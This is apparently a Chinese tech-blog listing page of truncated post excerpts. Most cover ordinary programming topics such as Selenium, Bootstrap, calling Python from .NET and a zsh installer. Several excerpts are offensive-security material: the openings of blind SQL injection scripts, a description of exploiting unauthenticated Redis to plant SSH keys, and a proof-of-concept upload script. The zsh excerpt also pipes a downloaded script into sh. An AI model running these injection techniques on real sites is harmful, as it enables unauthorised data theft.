自己写的一段Python脚本,经常拿来验证一些sqlmap等工具跑不出数据的网站. GET类型: import urllib import urllib2 import time payloads = 'abcdefghijklmnopqrstuvwxyz0123456789@_.' header = { 'User-Agent' : 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)' } values={} print 'Start to retr…

#author:windy_2import requests urlx = 'http://127.0.0.1/?id= 1 and if((substr((select database()),' payloads = 'qwertyuiopasdfghjklzxcvbnm{}_0123456789' def guess_column(table): string = '' extend = 0 list = [] length2 = 0 num = [] num1 = [] url1 = '…

漏洞简介 简单来说,redis是一个数据库.在默认的配置下,redis绑定在0.0.0.0:6379,也就是说,如果服务器有公网ip,可以通过访问其公网ip的6379端口来操作redis.最为致命的是,redis默认是没有密码验证的,可以免密码登录操作,攻击者可以通过操作redis进一步控制服务器. 漏洞的危害 无密码验证登录redis后,可读取.删除.更改数据 攻击者可以通过redis读写文件,植入后门 如果redis以root权限运行,攻击者可以写入ssh公钥文件,然后即可远程ssh登录服务…

前言 上一篇基于七牛Python SDK写的一个同步脚本所写的脚本只支持上传,不支持文件下载. 虽然这个需求不太强烈,但有可能有人(在备份.迁移时)需要,而官方有没提供对应的工具,所以我就把这个功能也加上. 实现 下载脚本的核心逻辑 (博客园的markdown代码区显示不友好,可以到我的个人博客中浏览) #!/usr/bin/env python #-*- coding:utf-8 -*- # # AUTHOR = "heqingpan" # AUTHOR_EMAIL = "…

简介: selenium 是一个web的自动化测试工具,不少学习功能自动化的同学开始首选selenium ,相因为它相比QTP有诸多有点: *  免费,也不用再为破解QTP而大伤脑筋 *  小巧,对于不同的语言它只是一个包而已,而QTP需要下载安装1个多G 的程序. *  这也是最重要的一点,不管你以前更熟悉C. java.ruby.python.或都是C# ,你都可以通过selenium完成自动化测试,而QTP只支持VBS *  支持多平台:windows.linux.MAC ,支持多浏览器:…

#! /usr/bin/env python # encoding:utf-8 import urllib2 import sys from poster.encode import multipart_encode from poster.streaminghttp import register_openers def poc(): register_openers() datagen, header = multipart_encode({"image1": open("…

某个项目中涉及到这样一个情景: VB/C#写的原始项目要调用Python的一些方法完成特殊的操作, 那么这就涉及到了,在.Net Framework中如何调用Python的脚本方法. 具体步骤流程如下所示: 1): 展示一个简单的Python代码,即传递一个参数,然后返回修改后字符串,此文件名称为 mytest.py def MyTestFunction(name): return "testing " + name 2): 我们借助第三方的工具来实现这个操作,那么这个第三方工具就是…

转载自:Q1mi Bootstrap介绍 Bootstrap是Twitter开源的基于HTML.CSS.JavaScript的前端框架. 它是为实现快速开发Web应用程序而设计的一套前端工具包. 它支持响应式布局,并且在V3版本之后坚持移动设备优先. 为什么要使用Bootstrap? 在Bootstrap出现之前: 命名:重复.复杂.无意义(想个名字费劲) 样式:重复.冗余.不规范.不和谐 页面:错乱.不规范.不和谐 在使用Bootstrap之后: 各种命名都统一并且规范化. 页面风格统一,画面…

一.esky介绍 Esky is an auto-update framework for frozen Python applications. It provides a simple API through which apps can find, fetch and install updates, and a bootstrapping mechanism that keeps the app safe in the face of failed or partial updates.…

基于linux的zsh安装脚本: Ubuntu版本: #!/bin/sh cd #安装zsh sudo apt-get install zsh #查看zsh cat /etc/shells #更改zsh chsh -s /bin/zsh #自动安装: wget https://github.com/robbyrussell/oh-my-zsh/raw/master/tools/install.sh -O - | sh #下载 git clone git://github.com/robbyrus…